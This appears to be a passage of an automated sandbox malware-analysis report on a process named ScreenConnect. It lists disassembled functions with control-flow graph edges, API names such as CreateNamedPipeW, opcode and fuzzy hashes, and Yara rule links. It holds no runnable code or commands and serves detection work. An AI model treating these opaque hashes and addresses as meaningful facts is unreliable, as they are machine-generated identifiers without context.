                                                                                                                                          • Instruction Fuzzy Hash: B432F221E1CAC74FE796DF2896657B9AFD2EF95301F14007AD08EC71D2DE9AB8058B40
                                                                                                                                          Function 00007FF9CC3B3642 Relevance: 1.7, APIs: 1, Instructions: 171pipeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 952 7ff9cc3b3642-7ff9cc3d58ba 955 7ff9cc3d58c4-7ff9cc3d5981 CreateNamedPipeW 952->955 956 7ff9cc3d58bc-7ff9cc3d58c1 952->956 958 7ff9cc3d5983 955->958 959 7ff9cc3d5989-7ff9cc3d59bc 955->959 956->955 958->959
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2347637328.00007FF9CC3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc3b0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateNamedPipe
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2489174969-0
                                                                                                                                          • Opcode ID: 2c9fddf7a6f40206cf90ecad4e770383947b9705077954a603238ce89fb88441
                                                                                                                                          • Instruction ID: 3844843374d309dc53cf3e4dacbc14e52635ad94ab36977a407c77e919b53650
                                                                                                                                          • Opcode Fuzzy Hash: 2c9fddf7a6f40206cf90ecad4e770383947b9705077954a603238ce89fb88441
                                                                                                                                          • Instruction Fuzzy Hash: 29518271918A5C8FDB58EF5C9845BE9BBE0FB59710F0442AEE04DD3251CB70A8958BC1
                                                                                                                                          Function 00007FF9CC6C48C9 Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 611 7ff9cc6c48c9-7ff9cc6c48da 612 7ff9cc6c48a8-7ff9cc6c48b1 611->612 613 7ff9cc6c48dc-7ff9cc6c4916 611->613 616 7ff9cc6c48b6-7ff9cc6c48c7 612->616 620 7ff9cc6c4918-7ff9cc6c4937 613->620 621 7ff9cc6c4939-7ff9cc6c4983 613->621 620->621 628 7ff9cc6c4985-7ff9cc6c4986 621->628 629 7ff9cc6c498d-7ff9cc6c4995 621->629 628->629
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: /$*$/$*
                                                                                                                                          • API String ID: 0-2770925684
                                                                                                                                          • Opcode ID: 113d07560e3503d7dace36239f6bacc63e2752f8ef3f3223677829e5c5c7f5ea
                                                                                                                                          • Instruction ID: 68fc5cdd0f168c763c413b1965a2b93536df04e1e6cde18fff88993a178b957f
                                                                                                                                          • Opcode Fuzzy Hash: 113d07560e3503d7dace36239f6bacc63e2752f8ef3f3223677829e5c5c7f5ea
                                                                                                                                          • Instruction Fuzzy Hash: E621C311B1CA9B0BE399EF6899A17B0ABD1EF59311B4540BAD04DC32D3EE99AC418781
                                                                                                                                          Function 00007FF9CC3B8014 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2347637328.00007FF9CC3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc3b0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                          • Opcode ID: ef1bcdff8d3359e1961cecf0ba79a490f6d976e2e35709f6fcf878729dc787c4
                                                                                                                                          • Instruction ID: a8c12b1f01d5df4f6c503233794b34ff0c6943018ee23c708595a5c51f1ff0f2
                                                                                                                                          • Opcode Fuzzy Hash: ef1bcdff8d3359e1961cecf0ba79a490f6d976e2e35709f6fcf878729dc787c4
                                                                                                                                          • Instruction Fuzzy Hash: 13511831D1C7894FDB18DFA8AC465F97BE0EF56360F04417FE489C3192DA64B8468B92
                                                                                                                                          Function 00007FF9CC6C5F74 Relevance: 1.6, Strings: 1, Instructions: 313COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1087 7ff9cc6c5f74-7ff9cc6c5f79 1088 7ff9cc6c6040-7ff9cc6c6047 1087->1088 1089 7ff9cc6c5f7f-7ff9cc6c5f9e 1087->1089 1090 7ff9cc6c60d7-7ff9cc6c60de 1088->1090 1091 7ff9cc6c604d-7ff9cc6c6054 1088->1091 1097 7ff9cc6c5fea-7ff9cc6c5ffe 1089->1097 1098 7ff9cc6c5fa0-7ff9cc6c5fbd 1089->1098 1092 7ff9cc6c60e9-7ff9cc6c60fc 1090->1092 1093 7ff9cc6c60e0-7ff9cc6c60e7 1090->1093 1091->1090 1095 7ff9cc6c605a-7ff9cc6c6064 1091->1095 1111 7ff9cc6c60fe-7ff9cc6c6103 1092->1111 1112 7ff9cc6c610d-7ff9cc6c6115 1092->1112 1093->1092 1096 7ff9cc6c6126-7ff9cc6c612d 1093->1096 1095->1096 1105 7ff9cc6c606a-7ff9cc6c60d5 1095->1105 1099 7ff9cc6c6133-7ff9cc6c613a 1096->1099 1100 7ff9cc6c6391-7ff9cc6c6398 1096->1100 1107 7ff9cc6c6030-7ff9cc6c6031 1097->1107 1108 7ff9cc6c6000-7ff9cc6c600a 1097->1108 1113 7ff9cc6c6b54-7ff9cc6c6b5c 1098->1113 1114 7ff9cc6c5fc3-7ff9cc6c5fe8 1098->1114 1099->1100 1106 7ff9cc6c6140-7ff9cc6c6143 1099->1106 1109 7ff9cc6c6b2e-7ff9cc6c6b41 1100->1109 1110 7ff9cc6c639e-7ff9cc6c63a5 1100->1110 1105->1096 1116 7ff9cc6c6145-7ff9cc6c6147 1106->1116 1117 7ff9cc6c614c-7ff9cc6c615a 1106->1117 1123 7ff9cc6c6038-7ff9cc6c6039 1107->1123 1118 7ff9cc6c6018-7ff9cc6c6022 1108->1118 1119 7ff9cc6c600c-7ff9cc6c6016 call 7ff9cc6c55e0 1108->1119 1110->1109 1120 7ff9cc6c63ab-7ff9cc6c63bd 1110->1120 1111->1112 1121 7ff9cc6c6b81-7ff9cc6c6c58 1112->1121 1122 7ff9cc6c611b-7ff9cc6c611f 1112->1122 1142 7ff9cc6c6b5d-7ff9cc6c6b6e 1113->1142 1114->1097 1126 7ff9cc6c61fa-7ff9cc6c61fd 1116->1126 1144 7ff9cc6c615c 1117->1144 1145 7ff9cc6c615e 1117->1145 1118->1123 1130 7ff9cc6c6024-7ff9cc6c602e call 7ff9cc6c18c0 1118->1130 1119->1107 1119->1118 1128 7ff9cc6c6409-7ff9cc6c6421 1120->1128 1129 7ff9cc6c63bf-7ff9cc6c63ca 1120->1129 1207 7ff9cc6c79f0-7ff9cc6c7a1a 1121->1207 1122->1096 1123->1088 1136 7ff9cc6c6206-7ff9cc6c6214 1126->1136 1137 7ff9cc6c61ff-7ff9cc6c6201 1126->1137 1147 7ff9cc6c63cc-7ff9cc6c63dc 1129->1147 1148 7ff9cc6c638d-7ff9cc6c638e 1129->1148 1130->1107 1130->1123 1163 7ff9cc6c6218 1136->1163 1164 7ff9cc6c6216 1136->1164 1146 7ff9cc6c62b5-7ff9cc6c62bb 1137->1146 1157 7ff9cc6c6b6f-7ff9cc6c6b80 1142->1157 1152 7ff9cc6c6160-7ff9cc6c6163 1144->1152 1145->1152 1153 7ff9cc6c62c1-7ff9cc6c62c3 1146->1153 1154 7ff9cc6c636d-7ff9cc6c636f 1146->1154 1156 7ff9cc6c63e2-7ff9cc6c6407 1147->1156 1147->1157 1148->1100 1160 7ff9cc6c6165-7ff9cc6c61f8 1152->1160 1161 7ff9cc6c616d-7ff9cc6c6178 1152->1161 1153->1154 1162 7ff9cc6c62c9-7ff9cc6c62fd 1153->1162 1154->1100 1159 7ff9cc6c6371-7ff9cc6c6379 1154->1159 1156->1128 1157->1121 1159->1100 1166 7ff9cc6c637b-7ff9cc6c638b 1159->1166 1160->1126 1169 7ff9cc6c61c4-7ff9cc6c61d2 1161->1169 1170 7ff9cc6c617a-7ff9cc6c618c 1161->1170 1162->1154 1172 7ff9cc6c621a-7ff9cc6c621d 1163->1172 1164->1172 1166->1148 1185 7ff9cc6c61d4 1169->1185 1186 7ff9cc6c618d-7ff9cc6c6197 1169->1186 1170->1186 1175 7ff9cc6c6227-7ff9cc6c6232 1172->1175 1176 7ff9cc6c621f-7ff9cc6c6225 1172->1176 1183 7ff9cc6c6234-7ff9cc6c623f 1175->1183 1184 7ff9cc6c627e-7ff9cc6c62a0 1175->1184 1181 7ff9cc6c62a3-7ff9cc6c62b3 1176->1181 1181->1146 1183->1184 1184->1181 1186->1142 1192 7ff9cc6c619d-7ff9cc6c61c2 1186->1192 1192->1169 1210 7ff9cc6c79e8-7ff9cc6c79ea 1207->1210 1211 7ff9cc6c7a1c-7ff9cc6c7a49 call 7ff9cc6c6ce8 * 2 1207->1211 1212 7ff9cc6c79b8-7ff9cc6c79c3 1210->1212 1213 7ff9cc6c79ec-7ff9cc6c79ef 1210->1213 1213->1207
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 6$*
                                                                                                                                          • API String ID: 0-1145867818
                                                                                                                                          • Opcode ID: e480a54d5325e92211eea55b7260aad0ec6f09146a260b6bc9b8ae5cc7f0dce0
                                                                                                                                          • Instruction ID: 320690fabb3a4a0121a7ab3aed2ca72fe30a844d684a77350b077ff73db47f30
                                                                                                                                          • Opcode Fuzzy Hash: e480a54d5325e92211eea55b7260aad0ec6f09146a260b6bc9b8ae5cc7f0dce0
                                                                                                                                          • Instruction Fuzzy Hash: 41A11121E0DAC70BEB5BEF289BA12B46F91EF46351B0840B9D48DDA1D3CD59F8068B45
                                                                                                                                          Function 00007FF9CC6C70F7 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1272 7ff9cc6c70f7-7ff9cc6c7111 1275 7ff9cc6c7113-7ff9cc6c7115 1272->1275 1276 7ff9cc6c7117-7ff9cc6c7125 call 7ff9cc6c0120 1272->1276 1277 7ff9cc6c7128-7ff9cc6c7131 1275->1277 1276->1277 1281 7ff9cc6c7138-7ff9cc6c713f 1277->1281 1282 7ff9cc6c7145-7ff9cc6c714c 1281->1282 1283 7ff9cc6c728e-7ff9cc6c72ac call 7ff9cc6c0d60 * 2 1281->1283 1282->1283 1284 7ff9cc6c7152-7ff9cc6c7169 1282->1284 1292 7ff9cc6c72d6-7ff9cc6c72f4 call 7ff9cc6c0d60 * 2 1283->1292 1293 7ff9cc6c72ae-7ff9cc6c72b8 1283->1293 1289 7ff9cc6c716b-7ff9cc6c717d 1284->1289 1290 7ff9cc6c719e-7ff9cc6c71a9 1284->1290 1303 7ff9cc6c7183-7ff9cc6c7191 call 7ff9cc6c0120 1289->1303 1304 7ff9cc6c717f-7ff9cc6c7181 1289->1304 1300 7ff9cc6c71ab-7ff9cc6c71ad 1290->1300 1301 7ff9cc6c71af-7ff9cc6c71be call 7ff9cc6c0120 1290->1301 1317 7ff9cc6c73ab-7ff9cc6c73b6 1292->1317 1318 7ff9cc6c72fa-7ff9cc6c7305 1292->1318 1297 7ff9cc6c72cc 1293->1297 1298 7ff9cc6c72ba-7ff9cc6c72ca 1293->1298 1299 7ff9cc6c72ce-7ff9cc6c72cf 1297->1299 1298->1299 1299->1292 1305 7ff9cc6c71c1-7ff9cc6c71c3 1300->1305 1301->1305 1308 7ff9cc6c7194-7ff9cc6c7197 1303->1308 1304->1308 1313 7ff9cc6c7278-7ff9cc6c728a 1305->1313 1314 7ff9cc6c71c9-7ff9cc6c71d7 1305->1314 1308->1290 1313->1283 1319 7ff9cc6c71de-7ff9cc6c71e0 1314->1319 1323 7ff9cc6c73b8-7ff9cc6c73ba 1317->1323 1324 7ff9cc6c73bc-7ff9cc6c73cb call 7ff9cc6c0120 1317->1324 1325 7ff9cc6c7307-7ff9cc6c7309 1318->1325 1326 7ff9cc6c730b-7ff9cc6c731a call 7ff9cc6c0120 1318->1326 1319->1313 1321 7ff9cc6c71e6-7ff9cc6c7203 1319->1321 1342 7ff9cc6c7205-7ff9cc6c720d 1321->1342 1343 7ff9cc6c720f 1321->1343 1327 7ff9cc6c73ce-7ff9cc6c73d0 1323->1327 1324->1327 1329 7ff9cc6c731d-7ff9cc6c7351 1325->1329 1326->1329 1334 7ff9cc6c7522-7ff9cc6c752d 1327->1334 1335 7ff9cc6c73d6-7ff9cc6c7416 call 7ff9cc6c0d60 * 2 1327->1335 1329->1317 1337 7ff9cc6c7353-7ff9cc6c7361 1329->1337 1335->1334 1367 7ff9cc6c741c-7ff9cc6c7423 1335->1367 1340 7ff9cc6c7374-7ff9cc6c737c 1337->1340 1341 7ff9cc6c7363-7ff9cc6c736b 1337->1341 1345 7ff9cc6c737d-7ff9cc6c737e 1340->1345 1347 7ff9cc6c738e-7ff9cc6c73a8 1340->1347 1341->1345 1346 7ff9cc6c736d-7ff9cc6c7372 1341->1346 1348 7ff9cc6c7211-7ff9cc6c7213 1342->1348 1343->1348 1350 7ff9cc6c7383-7ff9cc6c738d call 7ff9cc6c6c78 1345->1350 1346->1350 1347->1317 1348->1313 1352 7ff9cc6c7215-7ff9cc6c721f 1348->1352 1350->1347 1355 7ff9cc6c7221-7ff9cc6c722b call 7ff9cc6c18c0 1352->1355 1356 7ff9cc6c722d-7ff9cc6c7235 1352->1356 1355->1283 1355->1356 1362 7ff9cc6c7263-7ff9cc6c7276 call 7ff9cc6c6c68 1356->1362 1363 7ff9cc6c7237-7ff9cc6c7242 1356->1363 1362->1283 1363->1319 1372 7ff9cc6c7244-7ff9cc6c725c call 7ff9cc6c5528 1363->1372 1370 7ff9cc6c7436-7ff9cc6c7438 1367->1370 1371 7ff9cc6c7425-7ff9cc6c7434 1367->1371 1373 7ff9cc6c743f-7ff9cc6c7463 1370->1373 1371->1370 1377 7ff9cc6c743a 1371->1377 1372->1362 1379 7ff9cc6c7465-7ff9cc6c7482 1373->1379 1380 7ff9cc6c74af-7ff9cc6c74c5 1373->1380 1377->1373 1383 7ff9cc6c7488-7ff9cc6c74ad 1379->1383 1384 7ff9cc6c752e-7ff9cc6c7588 1379->1384 1383->1380 1389 7ff9cc6c758a-7ff9cc6c75a7 1384->1389 1390 7ff9cc6c75d0-7ff9cc6c75ed 1384->1390 1395 7ff9cc6c75a9-7ff9cc6c75ce 1389->1395 1396 7ff9cc6c75f0-7ff9cc6c7618 1389->1396 1399 7ff9cc6c75ee 1390->1399 1395->1390 1402 7ff9cc6c761a-7ff9cc6c7646 1396->1402 1403 7ff9cc6c765f-7ff9cc6c7670 1396->1403 1399->1399 1412 7ff9cc6c7648-7ff9cc6c7649 1402->1412 1413 7ff9cc6c764c-7ff9cc6c765d 1402->1413 1407 7ff9cc6c76a2-7ff9cc6c76ab 1403->1407 1408 7ff9cc6c7672-7ff9cc6c7681 1403->1408 1410 7ff9cc6c7683-7ff9cc6c7684 1408->1410 1411 7ff9cc6c7687-7ff9cc6c76a1 1408->1411 1410->1411 1412->1413 1413->1403
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: H
                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                          • Opcode ID: 0a05188b5e893a7751834831b49ec5e51e115e54fb6447b5546ef40fce0e47ad
                                                                                                                                          • Instruction ID: 9b57efaabde47fdba03e202f8814e4b97acf465105e0a032b4510d18775270a9
                                                                                                                                          • Opcode Fuzzy Hash: 0a05188b5e893a7751834831b49ec5e51e115e54fb6447b5546ef40fce0e47ad
                                                                                                                                          • Instruction Fuzzy Hash: 19717831E1C9874AFB96DE2483517BDAAD2EF94342F544439D49EC31C1DFAEB8468A40
                                                                                                                                          Function 00007FF9CC6C000C Relevance: .6, Instructions: 576COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ae12b02401195480b6d45ce787e23fec367733db4535b0960df1322ee826dcd8
                                                                                                                                          • Instruction ID: 34addec0059e4887f46511f8126a299b68fd0a2e5921c0d628cb6664648783eb
                                                                                                                                          • Opcode Fuzzy Hash: ae12b02401195480b6d45ce787e23fec367733db4535b0960df1322ee826dcd8
                                                                                                                                          • Instruction Fuzzy Hash: E812B427E0E7D34FE717DB285AA61E53FA0DF53225B0D00F7C4C8DA0A3E94A684A8751
                                                                                                                                          Function 00007FF9CC6C069D Relevance: .5, Instructions: 476COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0abaaa4a772c4a521c701d461562774ee7de9d5ff3cf74b6bf3562b3af3be8c7
                                                                                                                                          • Instruction ID: 4dce00c83ae25839bb442ef51ca5250310b87cd7f3af03eba3f599c1d23c8b08
                                                                                                                                          • Opcode Fuzzy Hash: 0abaaa4a772c4a521c701d461562774ee7de9d5ff3cf74b6bf3562b3af3be8c7
                                                                                                                                          • Instruction Fuzzy Hash: 95E1C131E1CA8B4FEB9AEF6896917A53BD1EF58301F144079D4CDC7292DD69F8428B40
                                                                                                                                          Function 00007FF9CC6C4E95 Relevance: .4, Instructions: 384COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 748dd6e860afb8a02319cd3038408175489af17504b681ea197c7f5b5799fea4
                                                                                                                                          • Instruction ID: e9be1490d6333f18ecb038e828625f3c8a70ec4b4af07a7db709b718a45ff5d7
                                                                                                                                          • Opcode Fuzzy Hash: 748dd6e860afb8a02319cd3038408175489af17504b681ea197c7f5b5799fea4
                                                                                                                                          • Instruction Fuzzy Hash: A5B13732E0C9870FEB5ADF289A429B57FD0EF95351B144579C48EC7583ED1AF8068B81
                                                                                                                                          Function 00007FF9CC6C4FB2 Relevance: .3, Instructions: 253COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 144f3405507b57dc90538f80f16516a6ae384777a0a356f2687260eea8bb7e99
                                                                                                                                          • Instruction ID: 0fd752990c381cd0879c67a0729fd3e987d0cea57fbd3dbf06ab4cf9c176653d
                                                                                                                                          • Opcode Fuzzy Hash: 144f3405507b57dc90538f80f16516a6ae384777a0a356f2687260eea8bb7e99
                                                                                                                                          • Instruction Fuzzy Hash: F071C532E1C9475BEB5AEF148A429B57BD0FF65341B504539C48FC3582EE2AF9068B81
                                                                                                                                          Function 00007FF9CC6C0766 Relevance: .2, Instructions: 237COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d13030b3705821dfe2819637e4a5371adddc5bde7d7fba1682e0891d5609b7c9
                                                                                                                                          • Instruction ID: ea6a1da7359a88311bf833be89012215ce19e601c2c4c2252828f30e372d1bd5
                                                                                                                                          • Opcode Fuzzy Hash: d13030b3705821dfe2819637e4a5371adddc5bde7d7fba1682e0891d5609b7c9
                                                                                                                                          • Instruction Fuzzy Hash: 54711270A19A5B8FEBA9EF58C6917A537D1FF58302F504078D4CEC7295DDA5F8028B40
                                                                                                                                          Function 00007FF9CC6C2BE8 Relevance: .2, Instructions: 237COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9fdb4f6fceed4949818c27918924ac73a2812890ddb3540ad18e1f6e3d22479b
                                                                                                                                          • Instruction ID: dffa4a3db688f050328f4c7704b6437fe352921d7031843a087fb8d45f2bedeb
                                                                                                                                          • Opcode Fuzzy Hash: 9fdb4f6fceed4949818c27918924ac73a2812890ddb3540ad18e1f6e3d22479b
                                                                                                                                          • Instruction Fuzzy Hash: F771D476E0C98B4FEB99DF289555BA57BD1FF69300B0441B8C48DDB187CA66F806CB80
                                                                                                                                          Function 00007FF9CC6C9591 Relevance: .2, Instructions: 169COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: bf60981480695864a3fca90fa326581b521c1f8db9a3070aff769b768ce88baa
                                                                                                                                          • Instruction ID: 1d8aee2841480eedb70d36ad679a75dca16c3db3919c292adb8489b321f5dd57
                                                                                                                                          • Opcode Fuzzy Hash: bf60981480695864a3fca90fa326581b521c1f8db9a3070aff769b768ce88baa
                                                                                                                                          • Instruction Fuzzy Hash: 9D418A22D0E7C70FE7578B355E255A03FA0AF5325170E41EBC4CADB0E3D95E680A8B62
                                                                                                                                          Function 00007FF9CC6C8479 Relevance: .2, Instructions: 154COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 13c2d2e9793606a463bc6758f09d8948022f5658b0270223760f7fb27ff7c078
                                                                                                                                          • Instruction ID: 84203206f6504c42c65c8b973401e3adc13dc9e4fab5f75671b2ae85bf1599ee
                                                                                                                                          • Opcode Fuzzy Hash: 13c2d2e9793606a463bc6758f09d8948022f5658b0270223760f7fb27ff7c078
                                                                                                                                          • Instruction Fuzzy Hash: 0D412B32E0C9878BE7A2DF19E9541E97F91FF9C305F440079D18DC7292DEA5B8068B44
                                                                                                                                          Function 00007FF9CC6C40BE Relevance: .1, Instructions: 139COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e3ff92bd787b4fc520d8c17cfe92999e50a2d9cffbe51a633ecdbcc389c411c4
                                                                                                                                          • Instruction ID: 574fa7368915548d11a403b9be023766f31c2ea03bff7f42f9269dab3819b437
                                                                                                                                          • Opcode Fuzzy Hash: e3ff92bd787b4fc520d8c17cfe92999e50a2d9cffbe51a633ecdbcc389c411c4
                                                                                                                                          • Instruction Fuzzy Hash: 8C41B734A08A4B4FDADDEF18C1957B577D2FF98305B6045B8C059CB68ACA75F842DB80
                                                                                                                                          Function 00007FF9CC6C6423 Relevance: .1, Instructions: 134COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 003f55573cdca85f1f6bd4930ad848b6b9a61fda2e7b3bd8bb334df8ec17d22f
                                                                                                                                          • Instruction ID: baf6e2f4c100eb0a35b29164b4c0456f2e262316537de9c14e0edcc3dcc4ce23
                                                                                                                                          • Opcode Fuzzy Hash: 003f55573cdca85f1f6bd4930ad848b6b9a61fda2e7b3bd8bb334df8ec17d22f
                                                                                                                                          • Instruction Fuzzy Hash: 1D41CB32E2C98B4FE75AAF1895417B47B90EB94345F50C07DC48EC6087ED69F8868B44
                                                                                                                                          Function 00007FF9CC6C8909 Relevance: .1, Instructions: 118COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 51ca51ae473cffc1ee4b14e4744529ccae15d44bdacc5457ed2e99c1a8ee0b67
                                                                                                                                          • Instruction ID: e196a95b51540c376d8391e29672e03179fe316125bf585ffe296d8470384159
                                                                                                                                          • Opcode Fuzzy Hash: 51ca51ae473cffc1ee4b14e4744529ccae15d44bdacc5457ed2e99c1a8ee0b67
                                                                                                                                          • Instruction Fuzzy Hash: 0A31FE33E0D9DB4BDBA7DF586A212F83F90EF49311F0401A6E44DD7292DE5AA8018746
